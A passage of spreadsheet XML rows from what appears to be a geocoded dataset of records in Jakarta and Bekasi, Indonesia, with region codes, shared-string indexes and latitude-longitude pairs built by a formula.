      <c r="R551" t="s">
        <v>287</v>
      </c>
      <c r="S551" t="s">
        <v>41</v>
      </c>
      <c r="T551" t="s">
        <v>42</v>
      </c>
      <c r="U551" s="5">
        <v>10691322</v>
      </c>
      <c r="V551" s="5" t="s">
        <v>14964</v>
      </c>
      <c r="W551" s="5">
        <v>-626197</v>
      </c>
      <c r="X551" t="s">
        <v>18770</v>
      </c>
      <c r="Y551" t="str">
        <f t="shared" si="8"/>
        <v>-6.26197,106.91322</v>
      </c>
    </row>
    <row r="552" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A552">
        <v>102275</v>
      </c>
      <c r="B552" s="1">
        <v>43869</v>
      </c>
      <c r="C552">
        <v>0</v>
      </c>
      <c r="D552" t="s">
        <v>22</v>
      </c>
      <c r="E552" t="s">
        <v>23</v>
      </c>
      <c r="F552" t="s">
        <v>2406</v>
      </c>
      <c r="H552" t="s">
        <v>26</v>
      </c>
      <c r="I552" t="s">
        <v>2196</v>
      </c>
      <c r="J552" t="s">
        <v>2407</v>
      </c>
      <c r="L552" t="s">
        <v>2408</v>
      </c>
      <c r="M552">
        <v>3175060006</v>
      </c>
      <c r="N552">
        <v>3175060</v>
      </c>
      <c r="O552">
        <v>3175</v>
      </c>
      <c r="P552">
        <v>31</v>
      </c>
      <c r="Q552" t="s">
        <v>2409</v>
      </c>
      <c r="R552" t="s">
        <v>2279</v>
      </c>
      <c r="S552" t="s">
        <v>547</v>
      </c>
      <c r="T552" t="s">
        <v>33</v>
      </c>
      <c r="U552" s="5">
        <v>10692403</v>
      </c>
      <c r="V552" s="5" t="s">
        <v>14965</v>
      </c>
      <c r="W552" s="5">
        <v>-613091</v>
      </c>
      <c r="X552" t="s">
        <v>18771</v>
      </c>
      <c r="Y552" t="str">
        <f t="shared" si="8"/>
        <v>-6.13091,106.92403</v>
      </c>
    </row>
    <row r="553" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A553">
        <v>102276</v>
      </c>
      <c r="B553" s="1">
        <v>43869</v>
      </c>
      <c r="C553">
        <v>0</v>
      </c>
      <c r="D553" t="s">
        <v>22</v>
      </c>
      <c r="E553" t="s">
        <v>23</v>
      </c>
      <c r="F553" t="s">
        <v>2410</v>
      </c>
      <c r="G553" t="s">
        <v>2411</v>
      </c>
      <c r="H553" t="s">
        <v>26</v>
      </c>
      <c r="I553" t="s">
        <v>1201</v>
      </c>
      <c r="J553" t="s">
        <v>2412</v>
      </c>
      <c r="M553">
        <v>3172090006</v>
      </c>
      <c r="N553">
        <v>3172090</v>
      </c>
      <c r="O553">
        <v>3172</v>
      </c>
      <c r="P553">
        <v>31</v>
      </c>
      <c r="Q553" t="s">
        <v>2283</v>
      </c>
      <c r="R553" t="s">
        <v>890</v>
      </c>
      <c r="S553" t="s">
        <v>49</v>
      </c>
      <c r="T553" t="s">
        <v>33</v>
      </c>
      <c r="U553" s="5">
        <v>10688248</v>
      </c>
      <c r="V553" s="5" t="s">
        <v>14966</v>
      </c>
      <c r="W553" s="5">
        <v>-617678</v>
      </c>
      <c r="X553" t="s">
        <v>18772</v>
      </c>
      <c r="Y553" t="str">
        <f t="shared" si="8"/>
        <v>-6.17678,106.88248</v>
      </c>
    </row>
    <row r="554" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A554">
        <v>102277</v>
      </c>
      <c r="B554" s="1">
        <v>43869</v>
      </c>
      <c r="C554">
        <v>0</v>
      </c>
      <c r="D554" t="s">
        <v>22</v>
      </c>
      <c r="E554" t="s">
        <v>23</v>
      </c>
      <c r="F554" t="s">
        <v>2413</v>
      </c>
      <c r="G554" t="s">
        <v>2414</v>
      </c>
      <c r="H554" t="s">
        <v>26</v>
      </c>
      <c r="I554" t="s">
        <v>974</v>
      </c>
      <c r="J554" t="s">
        <v>2415</v>
      </c>
      <c r="L554" t="s">
        <v>2416</v>
      </c>
      <c r="M554">
        <v>3175050001</v>
      </c>
      <c r="N554">
        <v>3175050</v>
      </c>
      <c r="O554">
        <v>3175</v>
      </c>
      <c r="P554">
        <v>31</v>
      </c>
      <c r="Q554" t="s">
        <v>1037</v>
      </c>
      <c r="R554" t="s">
        <v>1013</v>
      </c>
      <c r="S554" t="s">
        <v>547</v>
      </c>
      <c r="T554" t="s">
        <v>33</v>
      </c>
      <c r="U554" s="5">
        <v>10689596</v>
      </c>
      <c r="V554" s="5" t="s">
        <v>14967</v>
      </c>
      <c r="W554" s="5">
        <v>-615496</v>
      </c>
      <c r="X554" t="s">
        <v>18773</v>
      </c>
      <c r="Y554" t="str">
        <f t="shared" si="8"/>
        <v>-6.15496,106.89596</v>
      </c>
    </row>
    <row r="555" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A555">
        <v>102278</v>
      </c>
      <c r="B555" s="1">
        <v>43869</v>
      </c>
      <c r="C555">
        <v>0</v>
      </c>
      <c r="D555" t="s">
        <v>22</v>
      </c>
      <c r="E555" t="s">
        <v>23</v>
      </c>
      <c r="F555" t="s">
        <v>2417</v>
      </c>
      <c r="G555" t="s">
        <v>2418</v>
      </c>
      <c r="H555" t="s">
        <v>26</v>
      </c>
      <c r="I555" t="s">
        <v>974</v>
      </c>
      <c r="J555" t="s">
        <v>1752</v>
      </c>
      <c r="L555" t="s">
        <v>2419</v>
      </c>
      <c r="M555">
        <v>3175050001</v>
      </c>
      <c r="N555">
        <v>3175050</v>
      </c>
      <c r="O555">
        <v>3175</v>
      </c>
      <c r="P555">
        <v>31</v>
      </c>
      <c r="Q555" t="s">
        <v>1037</v>
      </c>
      <c r="R555" t="s">
        <v>1013</v>
      </c>
      <c r="S555" t="s">
        <v>547</v>
      </c>
      <c r="T555" t="s">
        <v>33</v>
      </c>
      <c r="U555" s="5">
        <v>10689694</v>
      </c>
      <c r="V555" s="5" t="s">
        <v>14968</v>
      </c>
      <c r="W555" s="5">
        <v>-615337</v>
      </c>
      <c r="X555" t="s">
        <v>18774</v>
      </c>
      <c r="Y555" t="str">
        <f t="shared" si="8"/>
        <v>-6.15337,106.89694</v>
      </c>
    </row>
    <row r="556" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A556">
        <v>102279</v>
      </c>
      <c r="B556" s="1">
        <v>43869</v>
      </c>
      <c r="C556">
        <v>0</v>
      </c>
      <c r="D556" t="s">
        <v>22</v>
      </c>
      <c r="E556" t="s">
        <v>23</v>
      </c>
      <c r="F556" t="s">
        <v>2420</v>
      </c>
      <c r="G556" t="s">
        <v>2421</v>
      </c>
      <c r="H556" t="s">
        <v>26</v>
      </c>
      <c r="I556" t="s">
        <v>2005</v>
      </c>
      <c r="J556" t="s">
        <v>2422</v>
      </c>
      <c r="L556" t="s">
        <v>2423</v>
      </c>
      <c r="M556">
        <v>3173010003</v>
      </c>
      <c r="N556">
        <v>3173010</v>
      </c>
      <c r="O556">
        <v>3173</v>
      </c>
      <c r="P556">
        <v>31</v>
      </c>
      <c r="Q556" t="s">
        <v>2338</v>
      </c>
      <c r="R556" t="s">
        <v>1481</v>
      </c>
      <c r="S556" t="s">
        <v>62</v>
      </c>
      <c r="T556" t="s">
        <v>33</v>
      </c>
      <c r="U556" s="5">
        <v>10681349</v>
      </c>
      <c r="V556" s="5" t="s">
        <v>14969</v>
      </c>
      <c r="W556" s="5">
        <v>-620976</v>
      </c>
      <c r="X556" t="s">
        <v>18775</v>
      </c>
      <c r="Y556" t="str">
        <f t="shared" si="8"/>
        <v>-6.20976,106.81349</v>
      </c>
    </row>
    <row r="557" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A557">
        <v>102280</v>
      </c>
      <c r="B557" s="1">
        <v>43869</v>
      </c>
      <c r="C557">
        <v>0</v>
      </c>
      <c r="D557" t="s">
        <v>22</v>
      </c>
      <c r="E557" t="s">
        <v>23</v>
      </c>
      <c r="F557" t="s">
        <v>2424</v>
      </c>
      <c r="G557" t="s">
        <v>2425</v>
      </c>
      <c r="H557" t="s">
        <v>26</v>
      </c>
      <c r="I557" t="s">
        <v>974</v>
      </c>
      <c r="J557" t="s">
        <v>1680</v>
      </c>
      <c r="L557" t="s">
        <v>2426</v>
      </c>
      <c r="M557">
        <v>3175050001</v>
      </c>
      <c r="N557">
        <v>3175050</v>
      </c>
      <c r="O557">
        <v>3175</v>
      </c>
      <c r="P557">
        <v>31</v>
      </c>
      <c r="Q557" t="s">
        <v>1037</v>
      </c>
      <c r="R557" t="s">
        <v>1013</v>
      </c>
      <c r="S557" t="s">
        <v>547</v>
      </c>
      <c r="T557" t="s">
        <v>33</v>
      </c>
      <c r="U557" s="5">
        <v>10689847</v>
      </c>
      <c r="V557" s="5" t="s">
        <v>14970</v>
      </c>
      <c r="W557" s="5">
        <v>-615641</v>
      </c>
      <c r="X557" t="s">
        <v>18776</v>
      </c>
      <c r="Y557" t="str">
        <f t="shared" si="8"/>
        <v>-6.15641,106.89847</v>
      </c>
    </row>
    <row r="558" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A558">
        <v>102281</v>
      </c>
      <c r="B558" s="1">
        <v>43869</v>
      </c>
      <c r="C558">
        <v>0</v>
      </c>
      <c r="D558" t="s">
        <v>22</v>
      </c>
      <c r="E558" t="s">
        <v>23</v>
      </c>
      <c r="F558" t="s">
        <v>2427</v>
      </c>
      <c r="G558" t="s">
        <v>2428</v>
      </c>
      <c r="H558" t="s">
        <v>26</v>
      </c>
      <c r="I558" t="s">
        <v>974</v>
      </c>
      <c r="J558" t="s">
        <v>1035</v>
      </c>
      <c r="L558" t="s">
        <v>2429</v>
      </c>
      <c r="M558">
        <v>3175050001</v>
      </c>
      <c r="N558">
        <v>3175050</v>
      </c>
      <c r="O558">
        <v>3175</v>
      </c>
      <c r="P558">
        <v>31</v>
      </c>
      <c r="Q558" t="s">
        <v>1037</v>
      </c>
      <c r="R558" t="s">
        <v>1013</v>
      </c>
      <c r="S558" t="s">
        <v>547</v>
      </c>
      <c r="T558" t="s">
        <v>33</v>
      </c>
      <c r="U558" s="5">
        <v>10689372</v>
      </c>
      <c r="V558" s="5" t="s">
        <v>14971</v>
      </c>
      <c r="W558" s="5">
        <v>-615416</v>
      </c>
      <c r="X558" t="s">
        <v>18777</v>
      </c>
      <c r="Y558" t="str">
        <f t="shared" si="8"/>
        <v>-6.15416,106.89372</v>
      </c>
    </row>
    <row r="559" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A559">
        <v>102282</v>
      </c>
      <c r="B559" s="1">
        <v>43869</v>
      </c>
      <c r="C559">
        <v>0</v>
      </c>
      <c r="D559" t="s">
        <v>22</v>
      </c>
      <c r="E559" t="s">
        <v>23</v>
      </c>
      <c r="F559" t="s">
        <v>2430</v>
      </c>
      <c r="G559" t="s">
        <v>2431</v>
      </c>
      <c r="H559" t="s">
        <v>26</v>
      </c>
      <c r="I559" t="s">
        <v>517</v>
      </c>
      <c r="J559" t="s">
        <v>2268</v>
      </c>
      <c r="M559">
        <v>3175030002</v>
      </c>
      <c r="N559">
        <v>3175030</v>
      </c>
      <c r="O559">
        <v>3175</v>
      </c>
      <c r="P559">
        <v>31</v>
      </c>
      <c r="Q559" t="s">
        <v>1592</v>
      </c>
      <c r="R559" t="s">
        <v>1563</v>
      </c>
      <c r="S559" t="s">
        <v>547</v>
      </c>
      <c r="T559" t="s">
        <v>33</v>
      </c>
      <c r="U559" s="5">
        <v>10686173</v>
      </c>
      <c r="V559" s="5" t="s">
        <v>14972</v>
      </c>
      <c r="W559" s="5">
        <v>-615321</v>
      </c>
      <c r="X559" t="s">
        <v>18778</v>
      </c>
      <c r="Y559" t="str">
        <f t="shared" si="8"/>
        <v>-6.15321,106.86173</v>
      </c>
    </row>
    <row r="560" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A560">
        <v>102283</v>
      </c>
      <c r="B560" s="1">
        <v>43869</v>
      </c>
      <c r="C560">
        <v>0</v>
      </c>
      <c r="D560" t="s">
        <v>22</v>
      </c>
      <c r="E560" t="s">
        <v>23</v>
      </c>
      <c r="F560" t="s">
        <v>2432</v>
      </c>
      <c r="G560" t="s">
        <v>2433</v>
      </c>
      <c r="H560" t="s">
        <v>26</v>
      </c>
      <c r="I560" t="s">
        <v>65</v>
      </c>
      <c r="J560" t="s">
        <v>2434</v>
      </c>
      <c r="L560" t="s">
        <v>2435</v>
      </c>
      <c r="M560">
        <v>3172080001</v>
      </c>
      <c r="N560">
        <v>3172080</v>
      </c>
      <c r="O560">
        <v>3172</v>
      </c>
      <c r="P560">
        <v>31</v>
      </c>
      <c r="Q560" t="s">
        <v>48</v>
      </c>
      <c r="R560" t="s">
        <v>141</v>
      </c>
      <c r="S560" t="s">
        <v>49</v>
      </c>
      <c r="T560" t="s">
        <v>33</v>
      </c>
      <c r="U560" s="5">
        <v>10690916</v>
      </c>
      <c r="V560" s="5" t="s">
        <v>14973</v>
      </c>
      <c r="W560" s="5">
        <v>-619758</v>
      </c>
      <c r="X560" t="s">
        <v>18779</v>
      </c>
      <c r="Y560" t="str">
        <f t="shared" si="8"/>
        <v>-6.19758,106.90916</v>
      </c>
    </row>
    <row r="561" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A561">
        <v>102284</v>
      </c>
      <c r="B561" s="1">
        <v>43869</v>
      </c>
      <c r="C561">
        <v>0</v>
      </c>
      <c r="D561" t="s">
        <v>22</v>
      </c>
      <c r="E561" t="s">
        <v>23</v>
      </c>
      <c r="F561" t="s">
        <v>2436</v>
      </c>
      <c r="G561" t="s">
        <v>2437</v>
      </c>
      <c r="H561" t="s">
        <v>26</v>
      </c>
      <c r="I561" t="s">
        <v>974</v>
      </c>
      <c r="J561" t="s">
        <v>2438</v>
      </c>
      <c r="L561" t="s">
        <v>2439</v>
      </c>
      <c r="M561">
        <v>3175050003</v>
      </c>
      <c r="N561">
        <v>3175050</v>
      </c>
      <c r="O561">
        <v>3175</v>
      </c>
      <c r="P561">
        <v>31</v>
      </c>
      <c r="Q561" t="s">
        <v>1740</v>
      </c>
      <c r="R561" t="s">
        <v>1013</v>
      </c>
      <c r="S561" t="s">
        <v>547</v>
      </c>
      <c r="T561" t="s">
        <v>33</v>
      </c>
      <c r="U561" s="5">
        <v>10691079</v>
      </c>
      <c r="V561" s="5" t="s">
        <v>14974</v>
      </c>
      <c r="W561" s="5">
        <v>-614824</v>
      </c>
      <c r="X561" t="s">
        <v>18780</v>
      </c>
      <c r="Y561" t="str">
        <f t="shared" si="8"/>
        <v>-6.14824,106.91079</v>
      </c>
    </row>
    <row r="562" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A562">
        <v>102285</v>
      </c>
      <c r="B562" s="1">
        <v>43869</v>
      </c>
      <c r="C562">
        <v>0</v>
      </c>
      <c r="D562" t="s">
        <v>22</v>
      </c>
      <c r="E562" t="s">
        <v>23</v>
      </c>
      <c r="F562" t="s">
        <v>2440</v>
      </c>
      <c r="G562" t="s">
        <v>2441</v>
      </c>
      <c r="H562" t="s">
        <v>26</v>
      </c>
      <c r="I562" t="s">
        <v>2442</v>
      </c>
      <c r="J562" t="s">
        <v>37</v>
      </c>
      <c r="L562" t="s">
        <v>2443</v>
      </c>
      <c r="M562">
        <v>3275010009</v>
      </c>
      <c r="N562">
        <v>3275010</v>
      </c>
      <c r="O562">
        <v>3275</v>
      </c>
      <c r="P562">
        <v>32</v>
      </c>
      <c r="Q562" t="s">
        <v>2444</v>
      </c>
      <c r="R562" t="s">
        <v>287</v>
      </c>
      <c r="S562" t="s">
        <v>41</v>
      </c>
      <c r="T562" t="s">
        <v>42</v>
      </c>
      <c r="U562" s="5">
        <v>10692392</v>
      </c>
      <c r="V562" s="5" t="s">
        <v>14975</v>
      </c>
      <c r="W562" s="5">
        <v>-627009</v>
      </c>
      <c r="X562" t="s">
        <v>18781</v>
      </c>
      <c r="Y562" t="str">
        <f t="shared" si="8"/>
        <v>-6.27009,106.92392</v>
      </c>
    </row>
    <row r="563" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A563">
        <v>102286</v>
      </c>
      <c r="B563" s="1">
        <v>43869</v>
      </c>
      <c r="C563">
        <v>0</v>
      </c>
      <c r="D563" t="s">
        <v>22</v>
      </c>
      <c r="E563" t="s">
        <v>23</v>
      </c>
      <c r="F563" t="s">
        <v>2445</v>
      </c>
      <c r="G563" t="s">
        <v>2446</v>
      </c>
      <c r="H563" t="s">
        <v>26</v>
      </c>
      <c r="I563" t="s">
        <v>893</v>
      </c>
      <c r="J563" t="s">
        <v>1711</v>
      </c>
      <c r="L563" t="s">
        <v>2447</v>
      </c>
      <c r="M563">
        <v>3175050001</v>
      </c>
      <c r="N563">
        <v>3175050</v>
      </c>
      <c r="O563">
        <v>3175</v>
      </c>
      <c r="P563">
        <v>31</v>
      </c>
      <c r="Q563" t="s">
        <v>1037</v>
      </c>
      <c r="R563" t="s">
        <v>1013</v>
      </c>
      <c r="S563" t="s">
        <v>547</v>
      </c>
      <c r="T563" t="s">
        <v>33</v>
      </c>
      <c r="U563" s="5">
        <v>10690676</v>
      </c>
      <c r="V563" s="5" t="s">
        <v>14976</v>
      </c>
      <c r="W563" s="5">
        <v>-614590</v>
      </c>
      <c r="X563" t="s">
        <v>18782</v>
      </c>
      <c r="Y563" t="str">
        <f t="shared" si="8"/>
        <v>-6.14590,106.90676</v>
      </c>
    </row>
    <row r="564" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A564">
        <v>102287</v>
      </c>
      <c r="B564" s="1">
        <v>43869</v>
      </c>
      <c r="C564">
        <v>0</v>
      </c>
      <c r="D564" t="s">
        <v>22</v>
      </c>
      <c r="E564" t="s">
        <v>23</v>
      </c>
      <c r="F564" t="s">
        <v>2448</v>
      </c>
      <c r="G564" t="s">
        <v>2449</v>
      </c>
      <c r="H564" t="s">
        <v>26</v>
      </c>
      <c r="I564" t="s">
        <v>974</v>
      </c>
      <c r="J564" t="s">
        <v>2415</v>
      </c>
      <c r="L564" t="s">
        <v>2450</v>
      </c>
      <c r="M564">
        <v>3175050001</v>
      </c>
      <c r="N564">
        <v>3175050</v>
      </c>
      <c r="O564">
        <v>3175</v>
      </c>
      <c r="P564">
        <v>31</v>
      </c>
      <c r="Q564" t="s">
        <v>1037</v>
      </c>
      <c r="R564" t="s">
        <v>1013</v>
      </c>
      <c r="S564" t="s">
        <v>547</v>
      </c>
      <c r="T564" t="s">
        <v>33</v>
      </c>
      <c r="U564" s="5">
        <v>10689885</v>
      </c>
      <c r="V564" s="5" t="s">
        <v>14977</v>
      </c>
      <c r="W564" s="5">
        <v>-614777</v>
      </c>
      <c r="X564" t="s">
        <v>18783</v>
      </c>
      <c r="Y564" t="str">
        <f t="shared" si="8"/>
        <v>-6.14777,106.89885</v>
      </c>
    </row>
    <row r="565" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A565">
        <v>102288</v>
      </c>
      <c r="B565" s="1">
        <v>43869</v>
      </c>
      <c r="C565">
        <v>0</v>
      </c>
      <c r="D565" t="s">
        <v>22</v>
      </c>
      <c r="E565" t="s">
        <v>23</v>
      </c>
      <c r="F565" t="s">
        <v>2451</v>
      </c>
      <c r="G565" t="s">
        <v>2452</v>
      </c>
      <c r="H565" t="s">
        <v>26</v>
      </c>
      <c r="I565" t="s">
        <v>2165</v>
      </c>
      <c r="J565" t="s">
        <v>37</v>
      </c>
      <c r="L565" t="s">
        <v>2453</v>
      </c>
      <c r="M565">
        <v>3275010011</v>
      </c>
      <c r="N565">
        <v>3275010</v>
      </c>
      <c r="O565">
        <v>3275</v>
      </c>
      <c r="P565">
        <v>32</v>
      </c>
      <c r="Q565" t="s">
        <v>2389</v>
      </c>
      <c r="R565" t="s">
        <v>287</v>
      </c>
      <c r="S565" t="s">
        <v>41</v>
      </c>
      <c r="T565" t="s">
        <v>42</v>
      </c>
      <c r="U565" s="5">
        <v>10691322</v>
      </c>
      <c r="V565" s="5" t="s">
        <v>14964</v>
      </c>
      <c r="W565" s="5">
        <v>-626197</v>
      </c>
      <c r="X565" t="s">
        <v>18770</v>
      </c>
      <c r="Y565" t="str">
        <f t="shared" si="8"/>
        <v>-6.26197,106.91322</v>
      </c>
    </row>
    <row r="566" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A566">
        <v>102289</v>
      </c>
      <c r="B566" s="1">
        <v>43869</v>
      </c>
      <c r="C566">
        <v>0</v>
      </c>
      <c r="D566" t="s">
        <v>22</v>
      </c>
      <c r="E566" t="s">
        <v>23</v>
      </c>
      <c r="F566" t="s">
        <v>2454</v>
      </c>
      <c r="G566" t="s">
        <v>2455</v>
      </c>
      <c r="H566" t="s">
        <v>26</v>
      </c>
      <c r="I566" t="s">
        <v>974</v>
      </c>
      <c r="J566" t="s">
        <v>1745</v>
      </c>
      <c r="L566" t="s">
        <v>2456</v>
      </c>
      <c r="M566">
        <v>3175050003</v>
      </c>
      <c r="N566">
        <v>3175050</v>
      </c>
      <c r="O566">
        <v>3175</v>
      </c>
      <c r="P566">
        <v>31</v>
      </c>
      <c r="Q566" t="s">
        <v>1740</v>
      </c>
      <c r="R566" t="s">
        <v>1013</v>
      </c>
      <c r="S566" t="s">
        <v>547</v>
      </c>
      <c r="T566" t="s">
        <v>33</v>
      </c>
      <c r="U566" s="5">
        <v>10691015</v>
      </c>
      <c r="V566" s="5" t="s">
        <v>14978</v>
      </c>
      <c r="W566" s="5">
        <v>-615858</v>
      </c>
      <c r="X566" t="s">
        <v>18784</v>
      </c>
      <c r="Y566" t="str">
        <f t="shared" si="8"/>
        <v>-6.15858,106.91015</v>
      </c>
    </row>
    <row r="567" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A567">
        <v>102290</v>
      </c>
      <c r="B567" s="1">
        <v>43869</v>
      </c>
      <c r="C567">
        <v>0</v>
      </c>
      <c r="D567" t="s">
        <v>22</v>
      </c>
      <c r="E567" t="s">
        <v>23</v>
      </c>
      <c r="F567" t="s">
        <v>2457</v>
      </c>
      <c r="H567" t="s">
        <v>26</v>
      </c>
      <c r="I567" t="s">
        <v>974</v>
      </c>
      <c r="J567" t="s">
        <v>37</v>
      </c>
      <c r="L567" t="s">
        <v>2458</v>
      </c>
      <c r="M567">
        <v>3216100001</v>
      </c>
      <c r="N567">
        <v>3216100</v>
      </c>
      <c r="O567">
        <v>3216</v>
      </c>
      <c r="P567">
        <v>32</v>
      </c>
      <c r="Q567" t="s">
        <v>2459</v>
      </c>
      <c r="R567" t="s">
        <v>940</v>
      </c>
      <c r="S567" t="s">
        <v>41</v>
      </c>
      <c r="T567" t="s">
        <v>42</v>
      </c>
      <c r="U567" s="5">
        <v>10698956</v>
      </c>
      <c r="V567" s="5" t="s">
        <v>14979</v>
      </c>
      <c r="W567" s="5">
        <v>-615022</v>
      </c>
      <c r="X567" t="s">
        <v>18785</v>
      </c>
      <c r="Y567" t="str">
        <f t="shared" si="8"/>
        <v>-6.15022,106.98956</v>
      </c>
    </row>
    <row r="568" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A568">
        <v>102291</v>
      </c>
      <c r="B568" s="1">
        <v>43869</v>
      </c>
      <c r="C568">
        <v>0</v>
      </c>
      <c r="D568" t="s">
        <v>22</v>
      </c>
      <c r="E568" t="s">
        <v>23</v>
      </c>
      <c r="F568" t="s">
        <v>2460</v>
      </c>
      <c r="G568" t="s">
        <v>2461</v>
      </c>
      <c r="H568" t="s">
        <v>26</v>
      </c>
      <c r="I568" t="s">
        <v>386</v>
      </c>
      <c r="J568" t="s">
        <v>1752</v>
      </c>
      <c r="L568" t="s">
        <v>2462</v>
      </c>
      <c r="M568">
        <v>3175050001</v>
      </c>
      <c r="N568">
        <v>3175050</v>
      </c>
      <c r="O568">
        <v>3175</v>
      </c>
      <c r="P568">
        <v>31</v>
      </c>
      <c r="Q568" t="s">
        <v>1037</v>
      </c>
      <c r="R568" t="s">
        <v>1013</v>
      </c>
      <c r="S568" t="s">
        <v>547</v>
      </c>
      <c r="T568" t="s">
        <v>33</v>
      </c>
      <c r="U568" s="5">
        <v>10689694</v>
      </c>
      <c r="V568" s="5" t="s">
        <v>14968</v>
      </c>
      <c r="W568" s="5">
        <v>-615341</v>
      </c>
      <c r="X568" t="s">
        <v>18786</v>
      </c>
      <c r="Y568" t="str">
        <f t="shared" si="8"/>
        <v>-6.15341,106.89694</v>
      </c>
    </row>
    <row r="569" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A569">
        <v>102292</v>
      </c>
      <c r="B569" s="1">
        <v>43869</v>
      </c>
      <c r="C569">
        <v>0</v>
      </c>
      <c r="D569" t="s">
        <v>22</v>
      </c>
      <c r="E569" t="s">
        <v>23</v>
      </c>
      <c r="F569" t="s">
        <v>2463</v>
      </c>
      <c r="G569" t="s">
        <v>2464</v>
      </c>
      <c r="H569" t="s">
        <v>26</v>
      </c>
      <c r="I569" t="s">
        <v>974</v>
      </c>
      <c r="J569" t="s">
        <v>2392</v>
      </c>
      <c r="L569" t="s">
        <v>2465</v>
      </c>
      <c r="M569">
        <v>3175050002</v>
      </c>
      <c r="N569">
        <v>3175050</v>
      </c>
      <c r="O569">
        <v>3175</v>
      </c>
      <c r="P569">
        <v>31</v>
      </c>
      <c r="Q569" t="s">
        <v>1012</v>
      </c>
      <c r="R569" t="s">
        <v>1013</v>
      </c>
      <c r="S569" t="s">
        <v>547</v>
      </c>
      <c r="T569" t="s">
        <v>33</v>
      </c>
      <c r="U569" s="5">
        <v>10690814</v>
      </c>
      <c r="V569" s="5" t="s">
        <v>14980</v>
      </c>
      <c r="W569" s="5">
        <v>-615605</v>
      </c>
      <c r="X569" t="s">
        <v>18787</v>
      </c>
      <c r="Y569" t="str">
        <f t="shared" si="8"/>
        <v>-6.15605,106.90814</v>
      </c>
    </row>
    <row r="570" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A570">
        <v>102294</v>
      </c>
      <c r="B570" s="1">
        <v>43869</v>
      </c>
      <c r="C570">
        <v>0</v>
      </c>
      <c r="D570" t="s">
        <v>22</v>
      </c>
      <c r="E570" t="s">
        <v>23</v>
      </c>
      <c r="F570" t="s">
        <v>2466</v>
      </c>
      <c r="G570" t="s">
        <v>2467</v>
      </c>
      <c r="H570" t="s">
        <v>26</v>
      </c>
      <c r="I570" t="s">
        <v>166</v>
      </c>
      <c r="J570" t="s">
        <v>1320</v>
      </c>
      <c r="L570" t="s">
        <v>2468</v>
      </c>
      <c r="M570">
        <v>3175050002</v>
      </c>
      <c r="N570">
        <v>3175050</v>
      </c>
      <c r="O570">
        <v>3175</v>
      </c>
      <c r="P570">
        <v>31</v>
      </c>
      <c r="Q570" t="s">
        <v>1012</v>
      </c>
      <c r="R570" t="s">
        <v>1013</v>
      </c>
      <c r="S570" t="s">
        <v>547</v>
      </c>
      <c r="T570" t="s">
        <v>33</v>
      </c>
      <c r="U570" s="5">
        <v>10690367</v>
      </c>
      <c r="V570" s="5" t="s">
        <v>14981</v>
      </c>
      <c r="W570" s="5">
        <v>-617938</v>
      </c>
      <c r="X570" t="s">
        <v>18788</v>
      </c>
      <c r="Y570" t="str">
        <f t="shared" si="8"/>
        <v>-6.17938,106.90367</v>
      </c>
    </row>
    <row r="571" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A571">
        <v>102295</v>
      </c>
      <c r="B571" s="1">
        <v>43869</v>
      </c>
      <c r="C571">
        <v>0</v>
      </c>
      <c r="D571" t="s">
        <v>22</v>
      </c>
      <c r="E571" t="s">
        <v>23</v>
      </c>
      <c r="F571" t="s">
        <v>2469</v>
      </c>
      <c r="G571" t="s">
        <v>2470</v>
      </c>
      <c r="H571" t="s">
        <v>26</v>
      </c>
      <c r="I571" t="s">
        <v>2471</v>
      </c>
      <c r="J571" t="s">
        <v>37</v>
      </c>
      <c r="L571" t="s">
        <v>2472</v>
      </c>
      <c r="M571">
        <v>3275060008</v>
      </c>
      <c r="N571">
        <v>3275060</v>
      </c>
      <c r="O571">
        <v>3275</v>
      </c>
      <c r="P571">
        <v>32</v>
      </c>
      <c r="Q571" t="s">
        <v>2473</v>
      </c>
      <c r="R571" t="s">
        <v>114</v>
      </c>
      <c r="S571" t="s">
        <v>41</v>
      </c>
      <c r="T571" t="s">
        <v>42</v>
      </c>
      <c r="U571" s="5">
        <v>10697003</v>
      </c>
      <c r="V571" s="5" t="s">
        <v>14982</v>
      </c>
      <c r="W571" s="5">
        <v>-624457</v>
      </c>
      <c r="X571" t="s">
        <v>18789</v>
      </c>
      <c r="Y571" t="str">
        <f t="shared" si="8"/>
        <v>-6.24457,106.97003</v>
      </c>
    </row>
    <row r="572" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A572">
        <v>102296</v>
      </c>
      <c r="B572" s="1">
        <v>43869</v>
      </c>
      <c r="C572">
        <v>0</v>
      </c>
      <c r="D572" t="s">
        <v>22</v>
      </c>
      <c r="E572" t="s">
        <v>23</v>
      </c>
      <c r="F572" t="s">
        <v>2474</v>
      </c>
      <c r="G572" t="s">
        <v>2475</v>
      </c>
      <c r="H572" t="s">
        <v>26</v>
      </c>
      <c r="I572" t="s">
        <v>882</v>
      </c>
      <c r="J572" t="s">
        <v>2392</v>
      </c>
      <c r="L572" t="s">
        <v>2476</v>
      </c>
      <c r="M572">
        <v>3175050002</v>
      </c>
      <c r="N572">
        <v>3175050</v>
      </c>
      <c r="O572">
        <v>3175</v>
      </c>
      <c r="P572">
        <v>31</v>
      </c>
      <c r="Q572" t="s">
        <v>1012</v>
      </c>
      <c r="R572" t="s">
        <v>1013</v>
      </c>
      <c r="S572" t="s">
        <v>547</v>
      </c>
      <c r="T572" t="s">
        <v>33</v>
      </c>
      <c r="U572" s="5">
        <v>10690724</v>
      </c>
      <c r="V572" s="5" t="s">
        <v>14983</v>
      </c>
      <c r="W572" s="5">
        <v>-615735</v>
      </c>
      <c r="X572" t="s">
        <v>18790</v>
      </c>
      <c r="Y572" t="str">
        <f t="shared" si="8"/>
